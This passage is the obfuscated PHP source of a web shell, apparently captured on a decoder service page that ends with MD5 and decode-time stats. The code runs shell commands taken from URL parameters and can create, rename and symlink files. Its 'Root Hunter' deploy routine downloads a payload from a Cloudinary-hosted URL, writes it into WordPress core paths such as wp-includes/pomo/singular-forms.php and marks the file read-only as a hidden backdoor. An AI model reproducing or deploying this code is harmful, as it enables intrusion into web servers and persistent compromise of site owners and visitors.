. "\74\x2f\160\162\145\76"; ex("\146\151\156\x64\40" . $_GET["\x66\151\x6e\144\x77\x72\x69\164\145"] . "\x20\55\164\x79\x70\x65\x20\144\x20\x2d\x77\x72\151\x74\141\x62\154\145\x20\x3e\40\x77\162\151\x74\141\x62\x6c\x65\56\x74\170\164"); echo "\x3c\x70\x20\143\x6c\141\x73\x73\75\47\x74\145\x78\164\55\x77\x68\x69\x74\x65\47\x3e\133\x2b\135\40\106\157\x75\156\x64\40\72\x20\x3c\x2f\160\x3e\x3c\x62\x72\x3e\x3c\160\40\143\x6c\x61\x73\163\x3d\x27\164\x65\170\164\55\167\x68\151\164\x65\x27\76" . ex("\x66\157\x72\x20\x69\40\x69\x6e\x20\44\x28\143\141\164\40\x77\162\x69\164\141\x62\x6c\x65\x2e\x74\170\164\x29\x3b\144\x6f\40\x70\162\151\156\164\146\x20\x22\x24\151\40\75\76\x20\x46\157\x75\x6e\144\xa\x22\73\144\157\156\145") . "\x3c\57\x70\x3e\74\57\144\151\166\76\74\57\x64\x69\x76\76"; die; } goto AjK8T; DjebA: if ($_GET["\141\x6b\x73\151"] == "\163\171\155\154\x69\156\x6b") { IIIIIII1l1l1($dir, $file); } goto UBaO0; IGcBk: function deployrh($dir) { echo "\74\x64\x69\166\x20\x63\x6c\141\163\x73\x3d\42\x63\141\x72\x64\x20\155\x62\x2d\65\42\x3e\xa\74\144\x69\166\x20\x63\x6c\x61\x73\163\x3d\x22\x63\x61\162\144\x2d\142\x6f\144\171\x20\x66\x6f\162\155\55\x67\x72\157\x75\160\42\76"; echo "\x3c\x70\x20\143\x6c\x61\163\x73\75\42\164\x65\170\x74\55\x77\141\162\156\151\156\x67\40\164\145\x78\164\55\x63\145\x6e\x74\x65\162\x20\x66\x6f\x6e\164\x2d\x77\x65\151\147\150\164\x2d\142\x6f\154\x64\x22\x3e\133\53\x5d\40\x44\x65\x70\154\x6f\171\x69\x6e\x67\40\122\157\x6f\x74\40\x48\x75\x6e\x74\145\x72\x20\x76\61\x3c\x2f\x70\x3e"; echo "\74\146\x6f\x72\155\x20\155\x65\x74\150\157\144\x3d\42\x70\x6f\x73\164\42\76"; echo "\74\x63\145\156\164\145\x72\76\74\x69\x6e\x70\165\x74\40\143\x6c\x61\x73\163\75\42\x62\x74\156\40\x62\x74\x6e\x2d\163\165\143\143\x65\163\163\x22\x20\164\171\160\145\x3d\x22\x73\165\142\155\x69\164\x22\40\x6e\141\155\x65\75\42\x64\x65\x70\154\157\171\x72\150\167\163\x22\40\166\x61\x6c\165\x65\x3d\x22\104\145\x70\x6c\x6f\x79\x20\122\x6f\x6f\x74\x20\x48\165\156\x74\x65\x72\42\76\74\x2f\143\145\156\164\x65\x72\x3e"; echo "\74\x2f\x66\x6f\x72\155\76"; if (isset($_POST["\144\x65\x70\154\157\x79\162\150\167\x73"])) { $deployrh_result = ''; $startDirectory = realpath(__DIR__); if (isset($_SERVER["\110\x54\x54\120\123"]) && $_SERVER["\110\124\124\120\123"] === "\157\x6e") { $url = "\150\164\x74\x70\163\x3a\x2f\57"; } else { $url = "\150\164\x74\160\72\57\57"; } $url .= $_SERVER["\x48\124\x54\120\x5f\x48\117\x53\124"]; if ($startDirectory !== $_SERVER["\104\x4f\103\x55\x4d\x45\116\x54\137\122\x4f\117\x54"]) { $rhws_path = $startDirectory . "\57\x77\x70\x2d\151\156\143\x6c\x75\144\x65\x73\x2f\x70\157\x6d\x6f\57"; $rhws = $startDirectory . "\x2f\167\x70\55\151\x6e\x63\x6c\x75\144\x65\x73\x2f\x70\157\155\157\57\163\151\156\147\165\x6c\141\x72\55\146\157\162\155\x73\x2e\160\x68\160"; $doc = $startDirectory . "\x2f\x66\x6f\157\164\x65\162\137\117\114\x44\56\x70\150\x70"; $cleaned = str_replace($startDirectory, '', $rhws_path); $cleaned_doc = str_replace($startDirectory, '', $doc); } else { $rhws_path = $_SERVER["\x44\117\x43\125\x4d\x45\116\124\137\x52\117\x4f\x54"] . "\x2f\167\160\x2d\151\x6e\143\154\x75\x64\145\x73\57\160\x6f\155\157\57"; $rhws = $_SERVER["\x44\117\x43\x55\115\105\116\x54\137\122\x4f\x4f\124"] . "\x2f\167\160\55\x69\156\x63\154\165\x64\x65\163\x2f\x70\157\x6d\x6f\x2f\163\x69\x6e\x67\165\154\141\162\55\x66\x6f\162\x6d\x73\56\x70\x68\x70"; $doc = $_SERVER["\x44\117\103\x55\115\x45\116\x54\137\x52\x4f\117\x54"] . "\57\146\x6f\x6f\x74\x65\x72\x5f\x4f\114\104\56\160\150\160"; $cleaned = str_replace($_SERVER["\x44\x4f\x43\x55\115\x45\x4e\124\x5f\x52\x4f\x4f\124"], '', $rhws_path); $cleaned_doc = str_replace($_SERVER["\104\x4f\x43\125\115\x45\116\x54\137\122\x4f\117\124"], '', $doc); } $src = "\x68\164\164\160\x73\x3a\x2f\x2f\x72\145\163\56\143\154\157\x75\x64\151\x6e\x61\162\171\x2e\143\x6f\x6d\57\x64\142\141\x73\x73\x65\164\163\x2f\x72\x61\167\x2f\165\x70\x6c\x6f\x61\x64\x2f\x76\x31\x36\x35\x32\x30\x33\70\61\x35\x32\x2f\x74\x6f\157\x6c\57\x63\x6c\141\x73\x73\55\x63\141\x74\145\147\x6f\162\171\x5f\147\165\147\172\67\161\x2e\164\170\x74"; if (file_exists($rhws)) { $deployrh_result .= "\74\x73\160\x61\x6e\40\143\154\141\163\163\x3d\42\x74\x65\x78\164\x2d\143\x65\156\x74\x65\162\x20\164\145\x78\x74\55\151\156\x66\157\40\x66\157\x6e\x74\x2d\167\x65\x69\147\x68\x74\55\x62\157\x6c\144\73\42\x3e\133\53\135\40\122\157\157\164\40\x48\x75\x6e\x74\x65\x72\40\166\x31\40\123\x75\x64\x61\150\x20\101\x64\141\41\x3c\57\163\x70\x61\156\x3e\x3c\x62\x72\x2f\x3e"; $deployrh_result .= "\x3c\163\x70\141\x6e\x20\x63\x6c\141\x73\x73\x3d\x22\x74\x65\x78\164\55\x63\145\156\164\x65\162\40\x74\x65\170\x74\x2d\151\x6e\146\x6f\x20\146\157\156\164\x2d\x77\145\151\147\150\164\55\x62\157\x6c\x64\x3b\x22\76\74\141\x20\150\162\x65\146\75\x22" . $url . $cleaned . "\x22\x20\x74\x61\x72\x67\x65\164\x3d\x22\137\142\154\141\156\153\42\x20\x72\x65\154\x3d\42\x6e\157\146\157\154\154\157\x77\40\156\157\x6f\160\x65\156\145\162\40\x6e\x6f\x72\145\146\145\x72\162\145\x72\42\x20\x63\154\141\163\x73\75\x22\x74\x65\170\x74\x2d\x63\x65\x6e\164\145\x72\x20\x74\x65\x78\x74\x2d\151\x6e\x66\157\42\x3e" . $url . $cleaned . "\74\x2f\141\x3e\74\57\x73\160\x61\156\76\74\142\162\x2f\76"; } if (file_exists($doc)) { $deployrh_result .= "\74\163\160\x61\156\x20\143\x6c\141\x73\x73\75\x22\164\x65\170\x74\x2d\x63\145\156\x74\145\x72\40\164\145\170\x74\55\x69\x6e\x66\x6f\x20\146\157\x6e\164\x2d\167\x65\x69\x67\x68\x74\x2d\x62\157\x6c\x64\x3b\42\76\133\53\x5d\x20\x52\157\157\164\x20\110\165\x6e\164\145\162\x20\166\61\x20\123\165\144\x61\150\40\x41\x64\141\41\74\x2f\x73\x70\141\x6e\x3e\74\x62\x72\57\x3e"; $deployrh_result .= "\x3c\163\x70\141\156\40\x63\x6c\141\x73\163\x3d\42\164\x65\170\164\55\143\145\x6e\164\145\162\40\164\145\170\x74\55\151\x6e\146\x6f\x20\146\157\156\x74\x2d\x77\145\151\147\x68\164\x2d\142\x6f\x6c\144\x3b\x22\76\x3c\x61\x20\150\x72\x65\x66\x3d\x22" . $url . $cleaned_doc . "\x22\40\164\141\162\147\145\x74\75\42\x5f\x62\154\141\156\153\x22\x20\x72\145\x6c\75\x22\156\157\146\157\154\154\x6f\x77\40\x6e\157\157\160\x65\x6e\x65\162\x20\156\x6f\162\145\146\145\162\x72\145\162\x22\40\143\154\x61\x73\x73\75\x22\164\145\x78\x74\55\143\x65\156\x74\145\x72\x20\164\x65\170\x74\x2d\151\x6e\x66\x6f\42\x3e" . $url . $cleaned_doc . "\x3c\57\x61\76\x3c\57\x73\x70\x61\x6e\76\x3c\x62\162\x2f\x3e"; } if (is_dir($rhws_path) && is_writable($rhws_path)) { $content = file_get_contents($src); $status = file_put_contents($rhws, $content); if ($status) { $deployrh_result .= "\74\163\160\141\x6e\40\x63\154\141\163\x73\x3d\x22\x74\145\x78\x74\x2d\x63\x65\x6e\164\x65\x72\40\164\145\170\164\55\x73\165\143\143\x65\x73\x73\40\x66\157\x6e\164\x2d\167\145\x69\147\150\x74\x2d\x62\157\154\144\73\42\x3e\133\x2b\135\x20\102\145\x72\150\x61\163\151\x6c\40\x44\145\160\154\157\171\x20\x52\157\x6f\x74\40\x48\x75\x6e\164\x65\162\x20\x76\61\41\74\x2f\x73\x70\x61\156\x3e\74\x62\x72\x2f\76"; $deployrh_result .= "\74\x73\x70\x61\156\x20\143\x6c\141\163\x73\x3d\42\x74\x65\x78\164\55\x63\x65\x6e\164\x65\x72\40\x74\x65\170\164\55\151\x6e\146\157\x20\146\x6f\x6e\164\55\167\x65\x69\x67\150\164\55\x62\x6f\x6c\x64\73\x22\x3e\74\141\x20\x68\162\145\x66\x3d\x22" . $url . $cleaned . "\42\40\x74\141\162\x67\x65\x74\x3d\42\x5f\142\154\141\x6e\153\x22\x20\x72\145\x6c\75\x22\x6e\157\x66\x6f\154\154\157\167\x20\156\157\x6f\160\x65\x6e\145\162\x20\x6e\x6f\162\145\146\x65\x72\162\x65\x72\x22\x20\x63\154\141\x73\163\x3d\x22\164\x65\170\x74\55\x63\x65\156\x74\145\162\40\164\x65\170\164\x2d\151\x6e\x66\157\x22\x3e" . $url . $cleaned . "\x3c\57\x61\x3e\74\x2f\x73\x70\x61\156\76\x3c\142\162\x2f\76\74\x62\162\x2f\76"; chmod($rhws, 292); } else { $deployrh_result .= "\74\x73\x70\x61\156\x20\143\154\141\163\x73\x3d\42\164\x65\x78\x74\55\143\x65\x6e\x74\145\162\x20\x74\145\x78\164\x2d\x64\x61\156\x67\x65\x72\x20\x66\157\x6e\164\55\x77\x65\x69\x67\x68\x74\x2d\x62\x6f\x6c\144\x3b\42\76\x5b\55\135\40\x47\x61\x67\141\x6c\x20\x44\x65\160\154\x6f\x79\x20\x52\x6f\157\x74\40\110\x75\x6e\x74\145\162\40\166\61\x21\74\x2f\163\x70\x61\156\x3e\74\142\162\x2f\x3e"; } } else { $content = file_get_contents($src); $status = file_put_contents($doc, $content); if ($status) { $deployrh_result .= "\x3c\163\x70\x61\x6e\x20\143\x6c\141\x73\x73\75\x22\x74\x65\170\x74\x2d\143\145\156\x74\145\x72\40\164\145\170\164\55\163\x75\x63\x63\145\x73\x73\x20\x66\157\156\164\55\x77\x65\151\147\150\x74\x2d\142\157\154\x64\x3b\42\x3e\x5b\x2b\135\x20\x42\145\162\x68\x61\x73\x69\154\x20\x44\145\160\154\157\171\40\122\x6f\157\164\x20\x48\165\156\164\x65\x72\x20\166\61\41\x3c\x2f\x73\x70\141\x6e\76\74\x62\x72\57\x3e"; $deployrh_result .= "\x3c\x73\160\x61\x6e\x20\x63\x6c\x61\x73\x73\75\x22\164\x65\170\x74\55\143\145\156\x74\x65\x72\40\x74\x65\x78\164\x2d\151\x6e\x66\157\40\146\x6f\156\164\55\167\x65\x69\147\150\164\x2d\x62\x6f\154\x64\x3b\42\76\74\x61\40\x68\162\x65\146\x3d\x22" . $url . $cleaned_doc . "\42\40\x74\x61\x72\x67\145\164\x3d\x22\137\142\x6c\141\x6e\153\42\40\x72\x65\154\x3d\x22\x6e\x6f\x66\x6f\x6c\154\x6f\167\40\156\157\157\x70\145\156\145\x72\x20\156\157\162\145\x66\145\162\162\145\162\42\40\x63\154\x61\163\163\x3d\42\x74\x65\x78\164\x2d\x63\145\x6e\164\145\x72\x20\164\x65\x78\x74\55\151\x6e\x66\157\x22\x3e" . $url . $cleaned_doc . "\74\57\x61\x3e\74\x2f\x73\160\141\x6e\76\74\x62\162\x2f\76\74\142\x72\57\76"; chmod($doc, 292); } else { $deployrh_result .= "\74\x73\x70\141\156\x20\143\x6c\x61\x73\163\x3d\42\164\145\170\x74\x2d\x63\145\x6e\164\x65\162\x20\x74\145\170\x74\55\144\141\x6e\x67\x65\162\x20\146\x6f\x6e\x74\55\167\145\x69\x67\x68\164\x2d\x62\x6f\x6c\x64\73\42\x3e\133\55\135\40\107\x61\147\141\154\x20\x44\145\x70\x6c\x6f\171\x20\122\x6f\x6f\x74\x20\110\x75\156\x74\x65\x72\40\166\x31\x21\74\x2f\163\x70\x61\x6e\x3e\x3c\142\x72\x2f\76"; } } echo "\x3c\144\x69\166\40\x73\x74\x79\154\x65\x3d\42\142\x6f\x72\x64\145\x72\x2d\142\x6f\164\164\157\x6d\x3a\x30\73\x6d\x61\x72\x67\151\x6e\55\x74\x6f\160\x3a\65\x70\170\73\42\x20\162\145\x61\144\x6f\x6e\154\x79\x3e"; echo "\x3c\x63\x65\x6e\164\x65\162\76"; print_r($deployrh_result) . PHP_EOL; echo "\x3c\x2f\143\x65\x6e\164\145\x72\x3e"; echo "\74\x2f\x64\151\166\x3e"; } echo "\x3c\57\x64\x69\x76\76\74\x2f\144\151\x76\x3e"; } goto eLB0i; bYCUl: if ($_GET["\x61\x6b\163\151"] == "\162\x65\x6e\141\155\145") { IIIIIIIll11I($dir, $file, $IIIIIIIlllIl, $IIIIIIII1l1l); } goto JNqQW; Ou_xB: function IIIIIIIlllll($dir, $IIIIIIII1l1l) { echo "\74\150\64\76{$IIIIIIII1l1l}\40\102\x75\x61\164\40\106\x69\154\145\40\72\74\x2f\x68\x34\x3e\xa\74\146\x6f\162\155\x20\155\145\x74\150\x6f\144\x3d\x27\120\x4f\x53\x54\x27\76\xa\74\144\151\x76\40\143\x6c\141\163\163\x3d\47\151\156\160\x75\x74\x2d\x67\x72\157\165\x70\x27\x3e\xa\74\x69\x6e\160\165\x74\40\164\x79\160\145\75\x27\x74\145\x78\x74\47\40\x63\x6c\141\163\x73\75\x27\146\x6f\162\x6d\55\143\157\x6e\164\162\x6f\154\x27\x20\156\x61\x6d\145\75\47\x6e\x61\155\x61\137\146\x69\154\145\133\x5d\47\x20\160\x6c\x61\x63\x65\x68\157\x6c\x64\145\x72\75\47\x4e\141\x6d\x61\40\106\x69\x6c\145\56\56\x2e\x27\76\12\x3c\144\x69\x76\x20\x63\x6c\141\x73\163\x3d\x27\151\156\160\x75\x74\55\x67\x72\x6f\165\x70\x2d\x70\162\145\160\145\x6e\x64\x27\76\12\74\144\x69\166\x20\143\x6c\141\163\x73\x3d\x27\x69\156\x70\165\x74\55\x67\162\x6f\165\160\x2d\x74\145\x78\x74\x27\x3e\x3c\141\40\x69\x64\75\47\x61\x64\144\137\151\156\x70\x75\164\47\x3e\74\151\40\x63\154\x61\x73\163\75\x27\146\141\x20\146\141\55\160\x6c\165\163\47\x3e\x3c\x2f\151\76\x3c\x2f\141\76\74\x2f\x64\151\166\x3e\xa\74\57\144\x69\x76\x3e\xa\74\x2f\144\151\166\76\74\x62\162\57\76\xa\x3c\x64\x69\166\40\151\144\75\x27\x6f\165\164\160\165\164\47\x3e\74\x2f\144\151\166\76\12\x3c\164\x65\x78\x74\141\x72\x65\x61\x20\156\141\155\145\75\47\151\x73\151\137\x66\151\154\145\47\40\143\154\x61\x73\163\75\47\146\157\x72\x6d\55\143\157\156\x74\162\x6f\x6c\47\x20\162\157\167\x73\x3d\x27\x31\65\x27\40\160\x6c\x61\x63\x65\x68\157\154\144\145\x72\75\x27\x49\163\151\40\106\x69\x6c\145\x2e\x2e\x2e\47\x3e\74\x2f\x74\x65\x78\x74\x61\162\x65\141\x3e\74\x62\162\57\76\12\x3c\x69\156\x70\x75\x74\x20\x74\171\x70\145\75\47\163\165\142\155\151\164\47\40\143\154\141\x73\x73\75\47\142\x74\x6e\40\x62\164\x6e\55\x73\x75\x63\143\x65\x73\x73\x20\142\164\156\x2d\142\x6c\x6f\143\153\40\x6d\x62\x2d\65\x27\40\156\x61\155\x65\75\x27\x62\x69\x6b\x69\156\47\40\166\x61\154\x75\x65\x3d\x27\102\165\141\164\x27\76\12\x3c\57\x66\x6f\x72\x6d\x3e"; if (isset($_POST["\x62\x69\x6b\151\x6e"])) { $name = $_POST["\156\141\x6d\x61\x5f\x66\x69\x6c\145"]; $isi_file = $_POST["\x69\163\x69\137\146\x69\x6c\x65"]; foreach ($name as $nama_file) { $IIIIIIIIlI1l = @fopen("{$nama_file}", "\167"); if ($isi_file) { $buat = @fwrite($IIIIIIIIlI1l, $isi_file); } else { $buat = $IIIIIIIIlI1l; } } if ($buat) { $IIIIIIIlIl1l = "\x73\x75\143\x63\x65\163\163"; $IIIIIIIlIl11 = "\102\145\162\x68\141\163\x69\x6c\x20\x4d\x65\x6d\142\x75\x61\x74\x20\106\x69\154\145"; IIIIIIIlIl1I($IIIIIIIlIl1l, $IIIIIIIlIl11, $dir); } else { $IIIIIIIlIl1l = "\145\162\162\x6f\162"; $IIIIIIIlIl11 = "\x47\x61\x67\141\154\x20\115\x65\155\142\x75\141\x74\40\106\x69\154\145"; IIIIIIIlIl1I($IIIIIIIlIl1l, $IIIIIIIlIl11, $dir); } } } goto aV7hf; VduaH: if ($_GET["\x61\153\x73\x69"] == "\x6d\157\144\165\x6c\x65\163") { modules($dir); } goto AFmQi; omEN2: ?>
Function Calls
None |
Stats
MD5 | 7212cf4a39d8b1f955037d0917a0599f |
Eval Count | 0 |
Decode Time | 94 ms |